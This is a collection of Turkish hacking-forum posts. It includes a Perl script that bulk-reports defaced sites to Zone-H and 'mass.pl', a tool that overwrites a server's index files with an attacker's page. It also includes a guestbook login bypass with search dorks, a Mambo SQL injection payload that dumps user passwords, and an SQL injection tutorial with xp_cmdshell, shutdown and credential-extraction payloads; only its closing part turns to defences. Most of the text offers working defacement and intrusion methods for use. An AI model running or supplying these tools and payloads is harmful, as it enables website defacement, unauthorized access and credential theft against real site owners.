(zone.pl) Zone-H.Org Mirror Kaydedici + mass.pl
Arkadaşlar zoneye bir anda yüzlerce siteyi tek hamlede kayıt edebiliyorsunuz. Sadece 1 adet yazma izni olan klasörlü bir shell ve hacklenmiş site
Kullanim Sekli: perl zoneh.pl Site Listesi Adi Adiniz
Şimdilik bi arkadaşın isteğin üzerine veriyorum. Yakında videosunuda eklerim.
Kod:
#!/usr/bin/perl
print "\t\t############################################# ###########\n\n";
print "\t\t# Zone-h.org Miror Kaydedici #\n\n";
print "\t\t# By zBiDy #\n\n";
print "\t\t############################################# ###########\n\n";
if(!@ARGV[1]){
print "\t\t\n\n";
print "\t\tKullanim Sekli: perl zone.pl <Site Listesi Adi> <Adiniz>\n\n";
exit;
}
$arq = @ARGV[0];
$grupo = @ARGV[1];
chomp $grupo;
open(a,"<$arq");
@site = <a>;
close(a);
$b = scalar(@site);
for($a=0;$a<=$b;$a++)
{chomp $site[$a];
if($site[$a] =~ /http/) { substr($site[$a], 0, 7) =""; }
print "[+] Postalandi $site[$a]\n";
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or next;
print $sock "POST /component/option,com_notify/Itemid,89/task,single/ HTTP/1.0\r\n";
print $sock "Accept: */*\r\n";
print $sock "Referer: http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/\r\n";
print $sock "Accept-Language: pt-br\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
print $sock "Host: www.zone-h.org\r\n";
$length=length("defacer=$grupo&domain=http%3A%2F%2 F$site[$a]&method=22&reason=5&option=com_notify");
print $sock "Content-Length: $length\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "\r\n";
print $sock "defacer=$grupo&domain=http%3A%2F%2F$site[$a]&method=22&reason=5&option=com_notify\r\n";
close($sock);
}
Mass.pl
Kod:
#!/usr/local/bin/perl
################################## ABOUT ################################################## #
$VERSION="Version 0.1 by LorD";
$about =
"\n\e[32m--== [ \e[31mIRAN HACKERS SABOATGE Tools for Mass Defacement $VERSION \e[32m] ==--\e[m\n".
"\e[36mContact:\e[m\n".
"\t \e[33m@\e[m\e[34mE-Mail\e[m: \e[36mlord\e[m\e[31m\@\e[m\e[36mihsteam.com\e[m\n".
"\t \e[33m#\e[m\e[34mIRC: \e[36mIRC.Zirc.org\e[m - channel \e[33m#\e[m\e[32mIHS\e[m\n".
"\n\e[31m=-=-=-=-=-=\e[m".
"\n\e[36mInfo:\e[m\n".
"\t\e[33m-d\e[m \e[31m=\e[m \e[33mDiretory that We Want be Massdeface\e[m\n".
"\t\e[33m-f\e[m \e[31m=\e[m \e[33mfile name that u want to attack for mass deafce\e[m\n".
"\t\e[33m-n\e[m \e[31m=\e[m \e[33m******** of attacker deface page.\e[m\n".
"\e[36mExemplo:\e[m\nperl $0.pl \e[33m-d\e[m /www \e[33m-f\e[m index. \e[33m-n\e[m /tmp/index.html\n".
"\e[31m=-=-=-=-=-=\e[m\n";
################################################## ##########################################
use Getopt::Std;
getopts('d:f:n:', \%args);
if (defined($args{'d'})){$dir=$args{'d'};}else{$dir=" ";}
if (defined($args{'f'})){$file=$args{'f'};}else{$file ="";}
if (defined($args{'n'})){$newfile=$args{'n'};}else{$n ewfile="";}
print $about;
$dirok="\e[33m[+]\e[m Ok, Diretory that wanna be Massdeface: \e[32m$dir\e[m";
$fileok="\e[33m[+]\e[m Ok, O file name for attack: \e[32m$file\e[m";
$newfileok="\e[33m[+]\e[m Ok, ******** of attacker index file: \e[32m$newfile\e[m";
if("$dir") {
print "$dirok\n";
sleep(1);
} else {
exit();
}
if("$file") {
print "$fileok\n";
sleep(1);
}
else
{
print "";
exit();
}
if("$newfile") {
print "$newfileok\n";
sleep(1);
}
else
{
print "";
exit();
}
printf "\e[33m[+]\e[m Start Defacing......\n";
my @troca;
find($dir, sub { push(@troca, $_[0]) if ($_[0] =~ /$file/i) });
my $quantidade = scalar(@troca);
if($quantidade<=0) {
print "\e[31m[-]\e[m Erro: Nenhum Arquivo encontrado.\n";sleep(1);
print "\e[31m[-]\e[m Coloque a extencao do arquivo.\n";sleep(1);
print "\e[31m[-]\e[m Ou, Apenas arquivo. [Sem extencao].\n";sleep(1);
exit();
}
printf "\e[33m[+]\e[m Ok, found: \e[32m$quantidade\e[m files...\n";sleep(1);
printf "\e[33m[+]\e[m Defacing index files.\n";
open(NEW, "< $newfile");
foreach $files(@troca)
{
open(FILE, "> $files");
while (<NEW>) {
print FILE $_;
}
close(FILE);
seek(NEW, 0, 0);
}
close(NEW);
sleep(1);
printf "\e[33m[+]\e[m hax0r3d Sucessfull!\n";sleep(1);
printf "\e[33m[+]\e[m Total files that defaced: \e[32m$quantidade\e[m\n";
sub find {
my ($path, $callback) = @_;
$path = '/' unless $path;
$path =~ s/^\/+/\//;
$path =~ s/\/$//;
my @files = list_dir($path);
my @dirs;
foreach my $file (@files) {
my $filepath = $path.'/'.$file;
&{$callback}($filepath);
push(@dirs, $filepath) if (-d $filepath);
}
undef(@files);
map { find($_, $callback) } @dirs;
return(1);
}
sub list_dir {
my ($dir, $dont_list_subdirs) = @_;
opendir(DIR, $dir) || return();
my @files = readdir(DIR);
closedir(DIR);
@files = grep { !-d "$dir/$_" } @files if ($dont_list_subdirs);
my @files = grep { $_ !~ /^(\.){1,2}$/ } @files;
return(@files);
}
Bakış sayısı: 265
Etiketler: zone-h mirror,zone-h mass
Ziyaretçi Defteri Açığı
Arama kodo ; MyDesign Ziyaretci Defteri v1.4Sonuna Eklencek Kod : yonetim.asp
merhaba arkadaşlar bu video yeni başlayanlar için eğitim amaclıdır...
acıgımız ziyaretci defteri =)
google arama kodumuz : MyDesign Ziyaretci Defteri v1.4
sonuna eklenecek kod: yonetim.asp
şimdi google.com'a girip arama yapalım..
kurban sitemiz
daha önce hacklenmiş biz bu
nun üstüne adımızı yazalım...
aramalar da dikkat ediceğimiz sonuna cıkan ziyaret/yonetim.asp bunlara tıklıcaz..
kullanıcı adı ve şifre istiyoo!
kullanıcı adı 'or'
şifre 'or'
panel deyiz =)
şimdi panele bakalım!
ayarlara tıkladık..
şimdi bakalım!!
bu iş bu kadar (;
selametle...
YADA BASKA YÖNTEM
My desing ziyaretci defteri acıgı pek acık sayılmaz da kuran webmastarların yaptıgı hataları uyararak haber verebılırız
google Kodu:
inurl:defter_oku.asp
inurl:yonetim.asp
inurldmin.asp
inurl:defter_yaz.asp
bu şekil aratarak arkadaşlar ziyaretci defterlerini bulabiliriz sonra mdb yolunda ulaşarak zd ayarlarından yonetim sayfasına cakabiliriz..
admin panel sayfası: /yonetim.asp yada /admin.asp
www.siteadı.com/defter/db/dbdefter.mdb
www.siteadi.com/defter/admin.asp yada yonetim.asp dir
Tüm Herseyı Yaptıgınızda Zd Panelinde Ayarlaryınca Cıkış Deyip
www.siteadı.com/defter/admin.asp ye gırdıgınızde Hacked by nickiniz yazacaktır
ben mesela bu sitede buldum acigi isterseniz deneyin
Bakış sayısı: 201
Etiketler: ziyaretçi defteri hey
Perl ve Python Exploit Bilgisi
Bu Dökümanımızda Sizlere Exploit Kullanımını ve Exploit’lerle İlgili Bilgiler Anlatacam. Döküman excalibuR & mad root Tarafından, StarHackz Kullanıcılarına Yazılmıştır.Döküman Başlıkları:
Exploits Nedir?
Perl Exploit Nedir?
Perl Exploit Nasıl Kullanılır?
Python Exploit Nedir?
Python Exploit Nasıl Kullanılır?
Şimdilik Bu 5 Başlığımızla Başlayalım.
Exploits Nedir?
Arkadaşlar, Exploitleri Kullanabilmeniz İçin Herhangi Bir Ek Programlama Dili Bilmenize Gerek Yoktur.
Ancak Exploit Kodlayacam Derseniz Programlama Bilmeniz Şart.
Exploitlerin Yazılma Amacı Bizim İçin, Hedef Sistemdeki Açığı Kontrol Altına Almak ve Kolayca Sömürmekdir.
Ben İhtiyacıma Göre Exploitleri İki Şekilde Kullanıyorum. Sitemizde Çeşitli Kaynaklar Var O Yüzden Kısaca Tanımını Yapacam.
1) Remote Exploitler (Remote Exploitler Uzaktan Kontrol Amacıyla Kullanılır. Örnek: Sistemde Bulunmasak Bile Kendi Makinamızdan Karşı Sistemi Etki Altına Alabilmemizi Sağlar)
2) Local Exploitler ( Local’de İse Kesinlikle Exploit’i Çalıştıracağımız Makinada Olmamız Gerekir. Örnek: Host, Server Gibi.)
Hedef Sisteme Göre, Sistemdeki Açığa Göre ve Hedef Üzerindeki İlerlemelerime Göre Her İkisinide Kullanıyorum.
Bir Exploit’in Hangi Dilde Kodlandığını Script Uzantısından Anlaşılabilir ( " .pl " " .py " " .php " vs...)
Yada Script İçindeki 1. Kod Satırından Görebiliriz. ( " #!/usr/bin/perl " " #!/usr/bin/python " " <?PHP " vs..)
NOT: Exploit Derleyici Programları Seçerken veya Kullanırken, Şuna Dikkat Etmeliyiz. Bir Exploit Perl Diliyle Kodlanmışsa Bu Exploit’i ActivePerl Programında Çalıştırmalıyız. Python Dilinde İse Python Programında Çalıştırmalıyız. Perl Exploit’i Python Programıyla Çalıştıramayız. Yani Exploitlerin Yazıldığı Dile Göre Derleyici Programı Kullanıyoruz.
Kısacası Exploitler Bize Yardımcı Kodlamalardır. Exploit’in Ne Olduğunu Anlamadıysanız veya Detaylı Bir Açıklama İhtiyacı Duyulursa Konu Altına Yazın Detaylıca Açıklayayım.
Perl Exploit Nedir?
Arkadaşlar Yukarıda’da Belirttiğim Gibi, PERL Diliyle Kodlanmış Exploitlerin Uzantıları .PL Dir. Bu Exploit’leri Kullanabilmeniz İçin, Bilgisayarınızda ACTİVEPERL Programının Kurulu Olması Gerekir.
Programı Sitemizden Yardımcı Yazılımlar Bölümünden Temin Edebilirsiniz.
Eğer Windows Kullanıyorsanız ActivePerl Kurarak Kullanabilirsiniz. Linux Kullanıyorsanız Perl Komutuyla Exploiti Kullanılabilir.
Detaylı Anlatımı Aşağıda Mevcut, Ancal Perl Exploit’in Ne Olduğunu Anlamadıysanız Detaylı Bir Açıklama İhtiyacı Duyarsanız Konu Altına Yazın Detaylıca Açıklayayım.
Perl Exploit Nasıl Kullanılır?
Arkadaşlar Perl Exploits’in Ne Olduğunu Yukarıda Belirttik. Perl Diliyle Yazılmıştır. ve Dosya Uzantısı.PL Dir.
Bir Exploits İn Perl Diliyle Yazılıp Yazılmadığınız " #!/usr/bin/perl " Exploit Kodlarının En Üstünden Görebiliriz.
Milw0rm, Securityfocus vb Sitelerden Bu Exploitleri Temin Edebilirsiniz.
Örnek: http://www.milw0rm.com/exploits/9665
Bu Exploite Baktığımız Zaman, En Üstte " #!/usr/bin/perl " Yazısını Görüyoruz ve Hemen Perl Diliyle Kodlandığını Anlıyoruz.
Exploit’i Kullanalım.
İlk Yapmanız Gereken, Milw0rm’dan Aldığımız Exploit’i excalibur.pl Adıyla Kaydediyoruz. ve " C:\\Perl\\bin " Klasörü İçine Atıyoruz.
*) Başlat - Çalıştır’a CMD Yazıyoruz ve Enter Tuşuna Basıyoruz.
*) Karşımıza MS-Dos Ekranı Geliyor.
*) Resimde’de Gördüğünüz Gibi Ekranda " C:\\************************s and Settings\\ElMuhammed> " Yazısı Var.
*) Şimdi Biz Perl Dizinine Geçeceğiz. Girmemiz Gereken Komut. (cd..) Komutudur. cd.. Yazıp Enter’e Basıyoruz. ve Bir Alt Dizine İniyoruz. " C:\\************************s and Settings> " Geldiğimiz Dizin. Burada Bir Kez Daha Aynı İşlemi yapıyoruz ve Tekrar (cd..) Yazıyoruz.
*) Şimdi " C:\\> " C:\\ Dizinine Ulaştık. Buradan Perl Klasörüne Geçeceğiz.
*) İlk Gireceğimiz Komut " cd perl " Komutudur. Şimdi Perl Klasörüne Girdik.
*) İkinci Komutumuz " cd bin " Komutudur. Şimdi İse Bin Klasörüne Ulaştık.
*) Exploit’imizi Çalıştıralım. " perl elmuhammed.pl " Yazıyoruz.
*) Karşımıza Exploit’in Derlenmiş Hali Geliyor. Dökümanda Kullandığım Exploit Bir Md5 Cracker Exploit’idir. Exploit’i derledik ve Kullanıma Hazır.
*) Yapacağımız Son Şey 32 Haneli Md5’i Yazıp Enter Tuşuna Basmak. (PC’de İnternet Olmadığından Kullanamıyoruz
)Gördüğünüz Gibi Perl Diliyle Kodlanmış Exploitler Bu Şekilde Kullanılıyor.
NOT: Bir Perl Exploit’in Kullanımını Görmek İçin Kodlar İçinde " Usage " Kısmına Bakmanız Yeterli Olur.
Python Exploit Nedir?
Python Diliyle Kodlanan Exploitlerin Dosya Uzantısı .PY Dir. Bu Exploit’leri Kullanabilmeniz İçin, Bilgisayarınızda PYTHON Programının Kurulu Olması Gerekir.
Python Programını Yardımcı Yazılımlar Bölümünden Temin Edebilirsiniz.
Bu Exploitlerimizi C:\\Python25\\ Klasörüne Atarak Çalıştırız,
Bir Exploit’in Python Diliyke Yazılıp Yazılmadığını Yine 2 Şekilde Anlarız.
1) Dosya Uzantısı (.py)
2) Script İçinde 1. Satır Alanında Yazan (#!/usr/bin/python) Yazısından Anlayabilirsiniz.
Kullanımı PERL İle Hemen Hemen Aynıdır. PERL Kullanabilen Biri Python’uda Rahatlıkla Kullanabilir. Python Kullanabilen Birisi Perl’i Rahatlıkla Kullanabilir.
Detaylı Anlatımı Aşağıda Mevcut, Ancal Python Exploit’in Ne Olduğunu Anlamadıysanız Detaylı Bir Açıklama İhtiyacı Duyarsanız Konu Altına Yazın Detaylıca Açıklayayım.
Python Exploit Nasıl Kullanılır?
Burada İlk Yapmamız Gerekn Milw0rm veya SecurityFocus Vb. Sitelerden Exploitimizi Bulmak. Bulduğumuz Exploiti Bilgisayarımıza excalibur.py Olarak Kaydediyoruz.
Dosyamızı c:\\python25\\ İçine Atıyoruz.
*) Başlat - Çalıştır’a CMD Yaıp MS-Dos’a Geçiyoruz.
*) Karşımıza MS-Dos Ekranı Geliyor.
*) Gördüğünüz Gibi Ms-Dos Çalışma Alanında " C:\\************************s and Settings\\Excalibur> " Yazısı Var.
*) Şimdi Python25 Klasörüne Geçeceğiz. Yukarıda Gösterdiğim Gibi Yine cd.. - cd.. Komutunu Kullanıyoruz.
*) Şimdi C:\\ Deyiz. Buradan Python Klasörüne Gireceğiz.
*) cd Python25 Yazıyoruz. ve Geldik.
*) c:\\python25\\ Klasörüne Attığımız Dosyamızı Çalıştırıyoruz.
*) Ekrana Dosya Adını Giriyoruz. elmuhammed.py Enter Diyoruz ve Eploitimiz Çalıştı. (Kullandığım Exploit Takvim’i Gösteriyor Resimde’de Gördüğünüz Gibi...)
Bu Şekilde’de Python Exploitlerimizi Kullanıyoruz.
Bu Dökümanımız Burada Bitmiştir.
Bakış sayısı: 147
Etiketler: exploit,exploit derle
Mambo Sql Açığ
google aramamızhttp://www.google.com.tr/search?q=in...r&start=0&sa=N
direk linki bu ama illahada görecem derseniz
inurl:func=selectcat + com_remository
enjekte kodumuz:
index.php?option=com_remository&func=selectcat&cat =64549999%20union%20select%201,concat(char(117,115 ,101,114,110,97,109,101,58),username,char(32,112,9 7,115,115,119,111,114,100,58),password),0,0,0%20fr om%20mos_users/*
www.xxx.com/dosya yolu olabilir/index.php....
enjekte kodumuzu index.php... yerini silip oraya koyacağız anlmayan warsa yazsın kolay bir
NOT:bu açığı mambo portalınız varsa kullanınız lütfen misyon dışı kullanmayalım
Bakış sayısı: 165
Etiketler: sql bug
MYSQL Server Root Pass Resetleme
Arkadaşlar geçen root passını unuttuğum serverim için root pass resetleme hakkında bir araştırma yaptım. Sizlerle de paylaşmak istedim. Denenmiştir çalışıyor.Not: Debian sistemine göre yazılmıştır.
#MYSQL ROOT PASS RESETLEME
#Source: http://dev.mysql.com/doc/refman/5.0...ermissions.html
#ROOT ol once
#adim 1:
cd /var/run/mysqld/
cat mysqld.pid
#bunu yaptigimizda bi sayi cikacak
kill $(dolar yerine o sayiyi yazacan)
#boylece SQL serverini durdurduk
#adim 2:
cd ~
pico mysql-init
# Bu dosyanin içine SET PASSWORD FOR 'root'@'localhost' = PASSWORD('MyNewPassword'); yazacan kaydedecen.
mysqld_safe --init-file=~/mysql-init &
#sonra o bisiler yapacak durduktan sonra
mysqld
#deyip serveri baslatiyoruz
#USTEKI YONTEM OLMADIYSA
#2. YONTEM
#adim 1:
#git 1. yoldaki gibi durdur serveri
#adim 2:
mysqld --skip-grant-tables --user=root
#bunun ne yaptigini bende bilmiyom serveri root olarak çalistiriyo herhalda
#ctrl + shift + T ile yeni sekme ac onda da root ol
mysql -u root
#bunu de mysql yorumlayicisina baglandik
UPDATE mysql.user SET Password=PASSWORD('newpwd') WHERE User='root';
#sonrada
FLUSH PRIVILEGES;
Bakış sayısı: 142
Etiketler: mysql bug,mysql hacking
SQL İnjection
SQL Enjeksiyon Saldırıları (SQL Injection)Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmaktadır.
Bu güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalıdır..
İlgilendiren Sektör ve Şirketler:
* Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar
* Internet / Intranet üzerinde uygulama geliştiren kuruluşlar
1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"
Yapısal Sorgulama Dili SQL’in uygulamalarda kullanımına örnek vermek gerekirse;
SELECT Name, Address FROM Users WHERE UserID = ’2081’
Şeklindeki SQL Deyimi "Users" adlı tablodan "2081" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlardır.
Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırlar.
Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" ’yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirler.
Maddi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımaktadır.
Böyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımaktadır.
2. Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."
Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kılacaktır.
Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™’ dan Microsoft® SQL Server™’a varsayılan sistem hesabı’ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak.
Form.asp : Username ve Password girdisini alan form.Solda...
Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.
2.1. Kötü Amaçlı (’) İmleçleri Yardımıyla İzinsiz Giriş Sağlama:
Kullanıcı "Username" & "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı & Şifre" mesajı verilecektir.
Örnekleyecek olursak;
Username : ilkay
Password : 2081
Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluşturacaktır;
SELECT count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’2081’
İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;
Username : ilkay
Password : ’ OR 1=1--
Şeklindeki girdilerle oluşturacağı SQL Deyimi ise;
SELECT count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’’ OR 1=1 --’
Olacaktır ki, bu durumda girişin sağlanması için şart "ilkay" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıdır.
* Hiçbişey = Boşluk
Sonuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı verilecektir.
Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server’a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlayacaktır..
2.2. Uzaktan Çalıştırılması Mümkün Olan Prosedürler:
MS SQL Server’a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" olabilir.
Username : ilkay
Password : ’; EXEC master..xp_cmdshell ’dir c:’--
Girdileriyle oluşacak SQL Deyimi;
SELECT count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’’; EXEC master..xp_cmdshell ’dir c:’--’
Sonuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı & Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaşacaktır.
2.3. SQL Server Hedef Alınarak Yapılan Saldırılar:
Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabilecektir.
SHUTDOWN WITH NOWAIT SQL Server’ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son verir.
Username : ’; SHUTDOWN WITH NOWAIT--
Password : [Boş]
Bu girdilerle oluşturulan SQL Deyimi;
SELECT Username FROM Users WHERE Username=’’; SHUTDOWN WITH NOWAIT; --’ AND Password=’’
Sonuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapanacaktır.
2.4. ODBC Hatalarından Faydalanarak Yapılan Saldırılar:
SQL Server’ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündür.
Hedef; http://Victim/Default.asp?id=10 şeklinde ürün ID leri ile çalışan ASP tabanlı bir websitesi.
Saldırı SQL Server’ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapılabilir;
Gönderilen ’10’ sayısına veritabanından herhangi bir string eklenir.
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de yine tüm tablo isimlerini içerir.
Oluşacak SQL Deyimi;
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
String -> Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı verecektir.
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’Table1’ to a column of data type int.
/Default.asp, line 5
Hata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir. Saldırgan diğer tabloların adını aşağıdaki şekilde öğrenebilir...
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’Table1’)--
Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaşabilir;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%25Login%25’--
SQL Server’ın vereceği hata;
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’Admin_Login’ to a column of data type int.
/Default.asp, line 5
Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Username FROM Admin_Login--
Hata;
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’ilkay’ to a column of data type int.
/Default.asp, line 5
Bu şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı girdi;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username=’ilkay’--
Hata;
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’2081’ to a column of data type int.
/Default.asp, line 5
Sonuç :
Username : ilkay
Password : 2081
2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme:
Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı açabilir...
http://Victim/Default.asp?id=10; UPDATE ’Admin_Login’ SET ’Password’ = ’NewPwd’ WHERE Username=’ilkay’--
Yeni bir kullanıcı hesabı için;
http://Victim/Default.asp?id=10; INSERT INTO ’Admin_Login’ (’UserID’, ’Username’, ’Password’, ’Details’) VALUES (666,’Desperate_Cry’,’2081’,’N/A’)--
3. Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."
Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".
3.1. Kullanıcı Haklarının Sınırlandırılması
Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.
Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.
3.2. Girdilerde Tırnak İmleçlerinin (’) Kötü Amaçlı Kullanımının Engellenmesi
Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (’) tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.
Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.
ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;
<%
Function ReplaceQuotes(strWords)
ReplaceQuotes = Replace(strWords,”’”,”””)
End Function
%>
Bu fonksiyonu baştaki örnekte kullanırsak;
SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’’ OR 1=1 --’
şeklinde olan deyim...
SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’" OR 1=1 --’
’e dönüşecektir.
3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi
